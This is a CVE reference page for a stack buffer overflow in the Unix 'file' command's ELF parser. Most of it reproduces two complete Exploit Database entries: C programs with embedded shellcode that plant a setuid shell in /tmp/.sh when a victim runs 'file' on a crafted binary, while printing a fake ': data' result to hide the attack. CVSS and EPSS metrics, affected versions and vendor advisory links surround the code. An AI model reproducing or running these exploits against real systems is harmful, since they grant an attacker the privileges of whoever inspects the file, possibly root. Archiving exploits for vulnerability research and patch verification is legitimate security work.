Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in tryelf() in readelf.c of the file command allows attackers to execute arbitrary code as the user running file, possibly via a large entity size value in an ELF header (elfhdr.e_shentsize).
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 4.6 | AV:L/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 22324
Publication date : 2003-03-03 23h00 +00:00
Author : lem0n
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/7008/info
It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file.
/*
** elfrape BY lem0n (lem0nxx@hotmail.com)
** a glorified stack overflow in file<=3.39
**
** "lame code for a lame bug"
**
** this bug was discovered by iDEFENSE retards
** (actually i discovered it and they bought it from
** me for $8, all that it is really worth)
**
** this code is mainly proof of concept and it has very little use
** "in the wild" unless your sysadmins and friends are morons.
**
** specify a valid elf binary, and elfrape will patch it so that
** it will exploit a stack overflow in file<=3.39. this exploit
** relies on the victim user (possibly root, but not required) to
** run file <patchedbinary>.
**
** a glorified stack overflow in file<=3.39
**
** file-3.37/readelf.c:tryelf()
** doshn(class, swap,
** fd,
** getu32(swap, elfhdr.e_shoff),
** getu16(swap, elfhdr.e_shnum),
** getu16(swap, elfhdr.e_shentsize));
**
** note that we can manipulate elfhdr.
** in doshn() we find a very bad thing...
**
** file-3.37/readelf.c:doshn()
** if (read(fd, sh_addr, size) == -1)
**
** now, fd is the file its processing, sh_addr is the address of a 32 byte char.
** size is the value read from the header (elfhdr.e_shentsize). So we make
** e_shentsize bigger then it should and voila, we got eip pretty easily.
** the shellcode cant easily be placed after the address however because file is very
** sensitive about its fd and the loop variable num being overwritten (it will either
** complain about bad fd and exit or hang in the loop). trying to preserve the values of
** each seemed stupid, so i found the best spot for
** the shellcode placement was in the beginning of the file, after the elf header
** because in the beginning of processing, file reads HOWMANY bytes from the start of the
** file onto the stack.
**
** #define HOWMANY 16384
**
** that makes for a pretty large landing pad, pop a few thousand nops in there
** and this should be a pretty reliable method.
**
** the shellcode also makes sure to output a seemingly genuine result, which will
** always be filename: data
**
** (16:11)[lem0n@keystone:~/audit/file]$cp /bin/sln sln
** (16:11)[lem0n@keystone:~/audit/file]$./elfrape -t 0 -f sln
** elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)
** [patching sln, trying to hit 0xbfffbab0]
** [setting section header size to trigger overwrite (0x32 bytes)]
** [setting section header entries to 1 to avoid a big mess on the stack]
** [writing new header to file]
** [writing target address to file @offset 0x5f4f0]
** [filling file with nops and shell code @offset 0x34]
** [exploit done]
** after someone runs 'file sln', execute /tmp/.sh
** (16:11)[lem0n@keystone:~/audit/file]$cp sln /tmp/whatami
** (16:11)[lem0n@keystone:~/audit/file]$echo and now we wait...
**
** typical sp offsets for -o mode are from -2000 to -6000
**
** Will create a 6755 /bin/.sh :>
**
** Note: may not work if used on files less than 8k or so.
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>
#define MAX_FILENAME 17/* the longest filename i suggest you use */
#define SHELL "/bin/ash"/* a shell that doesnt do seteuid(getuid()); ash,ksh,zsh,etc */
#define LANDING_SIZE 8192/* pretty big considering its just nops and shellcode */
/* shellcode shamelessly stolen (from ?) and modified */
char shellcode[] =
"\x31\xc0\x31\xdb\x31"
"\xd2"
"\x68" "\x00\x00\x00\x00"
"\x68" "\x00\x00\x00\x00"
"\x68" "\x00\x00\x00\x00"
"\x68" "\x00\x00\x00\x00"
"\x68" "\x00\x00\x00\x00"
"\x68" "\x00\x00\x00\x00"
"\x68" "\x00\x00\x00\x00"
"\x89\xe1\xb2\x20\x43\xb0\x04\xcd\x80\x31\xc0"
"\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0"
"\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88"
"\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3"
"\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c "
"/bin/cp " SHELL " /tmp/.sh;chmod 6755 /tmp/.sh";
#define EI_NIDENT 16
typedef unsigned short int Elf32_Half;
typedef unsigned long int Elf32_Word;
typedef unsigned long int Elf32_Addr;
typedef unsigned long int Elf32_Off;
typedef struct
{
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shtrndx;
}
Elf32_Ehdr;
struct targets
{
int target;
char *description;
Elf32_Half e_shentsize;
Elf32_Off e_shoff_delta;
unsigned long int addr;
};
struct targets targets[] = {
{0, "Slackware 8.1 (file-3.37-3.1)", 50, 44, 0xbfffc19c},
{1, "Red Hat Linux release 7.2 (Enigma) (file-3.35)", 80, 76, 0xbfffc19c},
{2, "Red Hat Linux release 6.2 (Zoot) (file-3.28)", 50, 44, 0xbfffc19c},
{0, NULL, 0, 0, 0}
};
extern char *optarg;
extern int optind;
void prepare_write_shellcode (char *program);
unsigned long get_sp (void);
void usage (char *argv0);
unsigned long
get_sp (void)
{
__asm__ ("movl %esp,%eax");
}
int
main (int argc, char *argv[])
{
int offset, fd, ix, nbytes, c, target = -1;
unsigned char buff[sizeof (Elf32_Ehdr)];
unsigned char attack[LANDING_SIZE];
unsigned char *file = NULL;
Elf32_Ehdr *ehdr;
Elf32_Off e_shoff;
Elf32_Half e_shnum;
Elf32_Half e_shentsize = 50;
Elf32_Off e_shoff_delta;
unsigned long int addr = 1;
while ((c = getopt (argc, argv, "t:f:o:")) != -1)
{
switch (c)
{
case 't':
target = atoi (optarg);
break;
case 'f':
file = (char *) strdup (optarg);
break;
case 'o':
addr = 0;
offset = atoi (optarg);
break;
default:
usage (argv[0]);
break;
}
}
printf
("elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\n");
if (!(file) || ((target == -1) && (addr)))
usage (argv[0]);
if (strchr(file,'/'))
{ printf("NO fucking slashes douchebag\n"); exit(-1); }
if (strlen(file) > MAX_FILENAME)
{ printf("Smaller filename please, unless you feel like editing the shell code\n");exit(-1); }
if (target >= 0)
{
if (target >= sizeof (targets) / sizeof (targets[0]) - 1)
{
fprintf (stderr, "Invalid type\n");
exit (-1);
}
e_shentsize = targets[target].e_shentsize;
e_shoff_delta = targets[target].e_shoff_delta;
addr = targets[target].addr;
}
if ((fd = open (file, O_RDWR)) < 0)
{
perror ("open()");
exit (-1);
}
if ((nbytes = read (fd, (char *) buff, sizeof (Elf32_Ehdr))) == -1)
{
error ("read failed (%s).\n", strerror (errno));
exit (-1);
}
ehdr = (Elf32_Ehdr *) buff;
if (addr == 0)
addr = get_sp () - offset;/* we have a big enough landing point that this addr should work */
printf (" [patching %s, tring to hit 0x%x]\n", file, addr);
printf
(" [setting section header size to trigger overwrite (0x%x bytes)]\n",
e_shentsize);
ehdr->e_shentsize = e_shentsize;
printf
(" [setting section header entries to 1 to avoid a big mess on the stack]\n");
ehdr->e_shnum = 1;
/* write the new elf header to the file */
printf (" [writing new header to file]\n");
if (lseek (fd, 0, SEEK_SET) == (off_t) - 1)
{
perror ("lseek()");
exit (-1);
}
if (write (fd, buff, sizeof (*ehdr)) == -1)
{
perror ("write()");
exit (-1);
}
/* seek to where we want our address to wait */
printf (" [writing target address to file @offset 0x%x]\n",
ehdr->e_shoff + e_shoff_delta);
if (lseek (fd, ehdr->e_shoff + e_shoff_delta, SEEK_SET) == (off_t) - 1)
{
perror ("lseek()");
exit (-1);
}
write (fd, &addr, 4);
memset (attack, 0x90, LANDING_SIZE);
prepare_write_shellcode (file);
memcpy (attack + LANDING_SIZE - sizeof (shellcode) - 1, shellcode,
sizeof (shellcode));
attack[LANDING_SIZE - 1] = 0x0;
printf (" [filling file with nops and shell code @offset 0x%x]\n",
sizeof (*ehdr));
/* set offset to just after the header, where our code will be */
if (lseek (fd, sizeof (*ehdr), SEEK_SET) == (off_t) - 1)
{
perror ("lseek()");
exit (-1);
}
if (write (fd, attack, LANDING_SIZE) == -1)
{
perror ("write()");
exit (-1);
}
printf (" [exploit done]\n");
printf ("after someone runs 'file %s', execute /tmp/.sh\n", file);
close (fd);
return 0;
}
void
usage (char *argv0)
{
int ix = 0;
printf ("Usage: %s -t <target num> -f <existing elf binary filename>\n",
argv0);
printf
(" %s -o <offset from sp> -f <existing elf binary filename>\n\n",
argv0);
while (targets[ix].target || ix == 0)
{
printf ("\t#%d: %s\n", targets[ix].target, targets[ix].description);
ix++;
}
exit (-1);
}
/* a quick and dirty hack to let the shellcode have the correct filename */
void
prepare_write_shellcode (char *program)
{
char *buf;
int ix;
char *ptr = shellcode + 37;
buf = (char *) malloc (strlen (program) + strlen (": data\n"));
memcpy (buf, program, strlen (program));
memcpy (buf + strlen (program), ": data\n", 7);
for (ix = 0; ix < strlen (buf); ix++)
{
if (ix && (ix % 4 == 0))
ptr -= 9;
*ptr = buf[ix];
ptr++;
}
free (buf);
return;
}
Exploit Database EDB-ID : 22325
Publication date : 2003-03-03 23h00 +00:00
Author : lem0nxx
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/7008/info
It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file.
/*
** file(1) exploit for *bsd,linux
** does cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh and also
** echos the correct filename followed by ": data"
** this one actually works w/o silly targets or offsets
** cmdshellcode by *://lsd-pl.net/
** lem0nxx@hotmail.com
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <errno.h>
/* elf stuff */
#define EI_NIDENT 16
#define ET_EXEC 2
#define EM_VPP500 17/* Fujitsu VPP500! */
#define EV_CURRENT 1
#define FILESIZE 16384
typedef unsigned short int Elf32_Half;
typedef unsigned long int Elf32_Word;
typedef unsigned long int Elf32_Addr;
typedef unsigned long int Elf32_Off;
typedef struct
{
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shtrndx;
}
Elf32_Ehdr;
unsigned long
get_sp (void)
{
__asm__ ("movl %esp,%eax");
}
unsigned char linux_code[] =
"\xeb\x22\x59\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89\xe1\x99\xb0\x0b"
"\xcd\x80\xe8\xd9\xff\xff\xff";
unsigned char bsd_code[] =
"\xeb\x25\x59\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89\xe7\x50\x57\x53"
"\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff";
unsigned char cmd[] =
"echo %s: data;/bin/cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh";
unsigned char *prepare_code (unsigned char *os_code, unsigned char *filename,
unsigned char *shell, int *code_len);
int
main (int argc, char *argv[])
{
unsigned char *final_code, *os_code, *shell, *attackbuff;
int fd, ix, code_len;
Elf32_Ehdr *ehdr;
if (!(attackbuff = (char *) malloc (FILESIZE)))
{
fprintf (stderr, "malloc error\n");
exit (-1);
}
ehdr = (Elf32_Ehdr *) attackbuff;
if (argc < 3)
{
fprintf (stderr, "Usage: %s <filename> <bsd|linux>\n", argv[0]);
exit (-1);
}
switch (argv[2][0])
{
case 'l':
case 'L':
os_code = linux_code;
if (!(shell = strdup ("ash")))
{
fprintf (stderr, "strdup error\n");
exit (-1);
}
break;
case 'b':
case 'B':
os_code = bsd_code;
if (!(shell = strdup ("tcsh")))/* does tcsh drop privs tho? ah well */
{
fprintf (stderr, "strdup error\n");
exit (-1);
}
break;
default:
fprintf (stderr, "Invalid target os\n");
exit (-1);
}
fprintf (stderr,
"elfrape2, using cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh shellcode\n",
shell);
final_code = prepare_code (os_code, argv[1], shell, &code_len);
fprintf (stderr, "Using %s shellcode, %d bytes for file %s\n",
argv[2][0] == 'b' ? "BSD" : "LINUX", code_len, argv[1]);
memset (attackbuff, 0x90, FILESIZE);
memset (attackbuff, 0x0, sizeof (Elf32_Ehdr));
memcpy (attackbuff + FILESIZE - code_len, final_code, code_len);
/* file requires the following shit */
ehdr->e_ident[0] = 0x7f; /* elf magic shit */
ehdr->e_ident[1] = 'E';
ehdr->e_ident[2] = 'L';
ehdr->e_ident[3] = 'F';
ehdr->e_ident[4] = 0x01;/* 32 bit objects */
ehdr->e_ident[5] = 0x01;/* LSB */
ehdr->e_type = ET_EXEC;/* if you wanna know, go google it */
ehdr->e_machine = EM_VPP500;
ehdr->e_version = EV_CURRENT;
ehdr->e_shoff = sizeof (Elf32_Ehdr);
ehdr->e_ehsize = sizeof (Elf32_Ehdr);
ehdr->e_shentsize = 2048;
ehdr->e_shnum = 0x0001;
for (ix = 0; ix < 256; ix += 4)
{
*(long *) (attackbuff + ehdr->e_ehsize + ix) = get_sp () - 1500;
}
if ((fd = open (argv[1], O_WRONLY | O_CREAT | O_TRUNC)) < 0)
{
perror ("open()");
exit (-1);
}
if (write (fd, attackbuff, FILESIZE) == -1)
{
perror ("write()");
exit (-1);
}
close (fd);
free (shell);
free (final_code);
fprintf (stderr,
"Use /tmp/.sh to gain the targets uid once they run 'file %s'\n",
argv[1]);
fprintf (stderr, "Make sure the shell you copied doesn't drop privs\n");
return 0;
}
/* this func allows for the shellcode to echo out legit results for file */
unsigned char *
prepare_code (unsigned char *os_code, unsigned char *filename,
unsigned char *shell, int *len)
{
unsigned char *complete;
*len = strlen (os_code);
*len += strlen (cmd);
*len += strlen (filename) - 2;
*len += strlen (shell) - 2;
if (!(complete = (char *) malloc (*len)))
{
fprintf (stderr, "malloc error\n");
exit (-1);
}
memcpy (complete, os_code, strlen (os_code));
sprintf (complete + strlen (os_code), cmd, filename, shell, shell, shell,
shell);
return complete;
}
Products Mentioned
Configuraton 0
File>>File >> Version 3.28
File>>File >> Version 3.30
File>>File >> Version 3.32
File>>File >> Version 3.33
File>>File >> Version 3.34
File>>File >> Version 3.35
File>>File >> Version 3.36
File>>File >> Version 3.37
File>>File >> Version 3.39
File>>File >> Version 3.40
Configuraton 0
Netbsd>>Netbsd >> Version 1.5
- Netbsd>>Netbsd >> Version 1.5 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.5.1
- Netbsd>>Netbsd >> Version 1.5.1 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.5.2
- Netbsd>>Netbsd >> Version 1.5.2 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.5.3
- Netbsd>>Netbsd >> Version 1.5.3 (Open CPE detail)
Netbsd>>Netbsd >> Version 1.6
- Netbsd>>Netbsd >> Version 1.6 (Open CPE detail)
- Netbsd>>Netbsd >> Version 1.6 (Open CPE detail)
References
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc
Tags : vendor-advisory, x_refsource_NETBSD
Tags : vendor-advisory, x_refsource_NETBSD
http://www.novell.com/linux/security/advisories/2003_017_file.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:030
Tags : vendor-advisory, x_refsource_MANDRAKE
Tags : vendor-advisory, x_refsource_MANDRAKE
